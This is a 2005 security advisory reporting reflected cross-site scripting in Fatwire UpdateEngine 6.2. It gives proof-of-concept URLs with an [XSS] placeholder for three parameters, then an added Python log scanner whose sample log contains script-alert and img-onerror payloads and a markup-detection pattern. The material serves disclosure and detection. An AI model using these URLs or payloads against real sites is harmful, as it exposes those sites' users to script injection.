by r0t,der4444,cembo,VietMafia

Friday, December 23, 2005

Fatwire UpdateEngine 6.2 multiple XSS vuln.

Vuln. discovered by: r0t
Date: 23 Dec. 2005
Vendor: http://www.fatwire.com/
Affected version: 6.2 and prior


Product Description:

UpdateEngine6 is a dynamic content management (DCM) solution to address some of the challenges facing enterprise-class e-business initiatives. Storing content at the field level in the database, allowing for the management of that content through a Web interface, exposing that content to innumerable uses, and publishing static Web pages and dynamic content form the basis of the UpdateEngine6 DCM solution. It enables business users to manage content, shortens installation and implementation time, provides a rich set of Web-based tools and wizards, and easily integrates with legacy systems. Since it is 100% Java, it can integrate with all major application servers, including IBM, BEA, Sun, Oracle and HP, and with all databases. Under an agreement made on May 1, 2002, FatWire announced that it would license Autonomy's advanced technology for its flagship product, UpdateEngine, to deliver a fully integrated categorization and retrieval solution into its content management software.

Vuln. Description:

UpdateEngine contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "FUELAP_TEMPLATENAME", "EMAIL" and "COUNTRYNAME" parameters isn't properly sanitised before being returned to the user.
This could allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


PoC:

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID=FWS%5FPAGE%5F1399202&FUELAP_SITEDBID=SITE%5F%2D66&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1404733&COUNTRY_ID=INTSITE%5F1167494&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRYNAME=us&SOURCEPAGE_ID=FWS%5FPAGE%5F1415379&FUELAP_TEMPLATENAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&EMAIL=[XSS]&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=us&FUELAP_SITEDBID=SITE%5F%2D66&

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&EMAIL=&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=[XSS]
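
As an added example (not code from the advisory or from FatWire), a log check a defender can run over web-server access logs for requests shaped like the PoC URLs above: it parses each request target, looks only at /UpdateEngine, URL-decodes the three parameters named in the advisory (repeatedly, so a double-encoded payload is still caught) and flags values that carry markup. The log lines are constructed sample data; the detection heuristic is an assumption, not anything the vendor ships.

```python
# Added example, not code from the advisory or from FatWire: flag /UpdateEngine
# requests whose FUELAP_TEMPLATENAME, EMAIL or COUNTRYNAME value carries markup.
import re
from urllib.parse import parse_qs, unquote, urlsplit

WATCHED_PARAMS = {"FUELAP_TEMPLATENAME", "EMAIL", "COUNTRYNAME"}
# Characters and tokens that never belong in these plain-text parameters (heuristic).
MARKUP = re.compile(r"[<>\"']|javascript:|on[a-z]+\s*=", re.IGNORECASE)
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so a double-encoded %253C still shows up as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target):
    """Return {param: decoded value} for watched params that contain markup."""
    parts = urlsplit(target)
    if not parts.path.endswith("/UpdateEngine"):
        return {}
    hits = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for raw in values:
            value = decode_fully(raw)  # parse_qs has already decoded once
            if MARKUP.search(value):
                hits[name] = value
    return hits


def scan_log(lines):
    """Yield (client_ip, param, decoded value) for each flagged request."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        for name, value in suspicious_params(m.group("target")).items():
            yield line.split(" ", 1)[0], name, value


# Constructed Apache-style lines: one benign request, one plain and one double-encoded attempt.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Dec/2005:10:01:02 +0000] "GET /UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=fws%5FforgotpasswordForm&EMAIL=a%40example.com HTTP/1.1" 200 512',
    '203.0.113.9 - - [23/Dec/2005:10:01:07 +0000] "GET /UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [23/Dec/2005:10:01:09 +0000] "GET /UpdateEngine?FUELAP_OP=FUELOP_NewScreen&EMAIL=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E&COUNTRYNAME=us HTTP/1.1" 200 640',
]
```

Running `list(scan_log(SAMPLE_LOG))` reports the two attempts from 203.0.113.9 and nothing for the benign request; requests to other paths are ignored even if they contain the same parameter names.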

Solution:
Edit the source code to ensure that input is properly sanitised.

Copyright (c) 2006 Pridels Sec Crew